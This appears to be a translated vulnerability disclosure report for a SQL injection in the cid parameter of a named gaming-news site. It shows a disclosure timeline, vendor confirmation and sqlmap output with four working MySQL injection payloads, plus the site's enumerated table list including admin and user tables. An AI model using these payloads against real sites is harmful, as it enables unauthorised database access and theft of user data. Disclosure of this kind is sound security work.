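2015-10-01: Details reported to the vendor; awaiting vendor response
2015-10-08: Vendor confirmed; details disclosed to the vendor only
2015-10-18: Details disclosed to core white hats and experts in related fields
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public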
The vendor takes this seriously, so here is another one~
http://xm.2144.cn/whole?cid=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cid=1 AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(9003=9003,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: cid=1;(SELECT * FROM (SELECT(SLEEP(5)))rzXi)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZYIs)

    Type: UNION query
    Title: Generic UNION query (NULL) - 24 columns
    Payload: cid=1 UNION ALL SELECT CONCAT(0x7170787071,0x6d4a695853526374436e,0x716b6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: web_2144_news
[46 tables]
+-----------------------+
| group                 |
| act_360_card          |
| act_card              |
| act_dice              |
| act_group             |
| act_item              |
| act_msg               |
| act_num               |
| act_peroid            |
| act_qs                |
| act_qs_userip         |
| act_tg                |
| act_wl150529_code     |
| act_wl150529_gold     |
| adcont                |
| admin                 |
| attribute             |
| category              |
| category_assignment   |
| category_stat         |
| channel               |
| city                  |
| detail                |
| element               |
| element_click         |
| element_extend        |
| element_stat          |
| element_votes         |
| guoqing_score_consume |
| guoqing_score_user    |
| guoqing_sign          |
| kf                    |
| ploy                  |
| ploy_consume          |
| ploy_income           |
| ploy_item             |
| ploy_rank             |
| ploy_user             |
| province              |
| search_record         |
| tbl_migration         |
| user_info             |
| users                 |
| video                 |
| video_relate          |
| video_stat            |
+-----------------------+
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-10-08 13:47
Thank you for supporting 2144's security work
None yet